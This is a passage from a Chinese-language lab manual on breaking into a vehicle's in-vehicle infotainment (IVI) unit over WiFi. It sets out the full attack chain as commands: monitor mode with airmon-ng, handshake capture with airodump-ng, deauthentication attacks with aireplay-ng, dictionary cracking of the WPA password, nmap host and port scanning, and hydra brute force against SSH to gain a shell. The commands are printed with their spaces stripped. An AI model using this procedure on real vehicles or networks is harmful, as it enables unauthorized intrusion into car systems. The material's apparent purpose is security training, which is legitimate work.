windows系统PC,工控机Ubuntu系统,IVI或TBox
六、实验整体流程
七、实验步骤
1.使用Aircrack-ng扫描WiFi,寻找到IVI的WiFi
sudoairmon-ngstart[你的无线网卡名称]
再次查看网卡信息,此时无线网卡的名称被自动更改为wlan0mon,模式是Monitor。然后激活网卡:
sudoifconfigwlan0monup
接下来可以对周围的WiFi进行探测。执行:
sudoairodump-ngwlan0mon
注意:探测列表会不停地刷新,为了便于获取想要的信息,可以在观察到列表中出现IVI的WiFi信息后,按“Ctrl+C”停止探测。也可以多次执行探测命令进行探测。
2.捕获WiFi的握手验证数据包
sudoairodump-ng--ivs--bssid[目标WiFi的mac地址]–wlongas-c[目标WiFi的工作频道]wlan0mon
其中,“--ivs”表示设置过滤,不保存所有无线数据,只保存可用于破解的IVS数据报文;“-c”用于设置目标WiFi的工作频道;“-w”后跟保存数据的文件名,建议使用示例所用的“longas”。
执行情况如上图所示,有两个列表,上面的列表是目标WiFi的抓包信息,下面是连接到该WiFi的设备列表。其中,STATION是接入设备的mac地址。对于加密类型为WPA/WPA2-PSK的无线网络,为了快速获得破解所需的握手验证完整数据包,在抓包过程中可以发送“DeAuth”数据包来将已经连接到该WiFi的客户端强制断开,在客户端自动重连时就可以捕获到包含握手验证的完整数据包了。另外打开一个终端,执行以下命令发送“Deauth”数据包。
sudoaireplay-ng-010-a[目标WiFi的mac地址]-c[接入设备的mac地址]wlan0mon
其中,“-0”表示采用DeAuth攻击模式,后跟攻击次数。可以在接入设备列表中任选一个接入设备,使用其mac地址。当抓包页面右上角显示“WPAhandshake”时,表示攻击成功。接下来就可以使用捕获的数据进行WiFi密码破解了。
3.暴力破解WiFi的密码
执行以下命令进行WiFi密码的破解。结果下图所示。
sudoaircrack-ng-w[字典文件]longas-*.ivs
即可使用破解出的密码连接WiFi秘密进入IVI内网。注意:Airodump-ng为了方便破解时的文件调用,会自动对保存文件按顺序编号,于是就多了-01这样的序号;再次抓包时,若还使用longas作为保持文件名,就会保存为longas-02.ivs。
4.对IVI进行端口扫描,发现Telnet或SSH端口
连接到IVI的WiFi热点之后,可以通过向本网段所有主机发送数据包来进行主机发现,进而确定IVI(网关)的IP地址。使用Nmap进行主机发现的命令如下:
nmap192.168.9.0/24-sn
得到类似下图所示的结果,可以看到网关的IP是192.168.9.2。
接下来对IVI的所有端口进行扫描,以获取系统开启了哪些端口和服务。命令如下:
sudonmap[IVI的IP地址]
端口扫描结果下图所示,观察到IVI打开了22端口,也就是SSH服务的常用端口,因此可以进一步密码爆破来获得系统访问权限。
5.爆破Telnet/SSH密码,进入shell
hydra[IVI的IP地址]ssh-Ldicts/user_dict.txt-Pdicts/pwd.txt-V-t6-f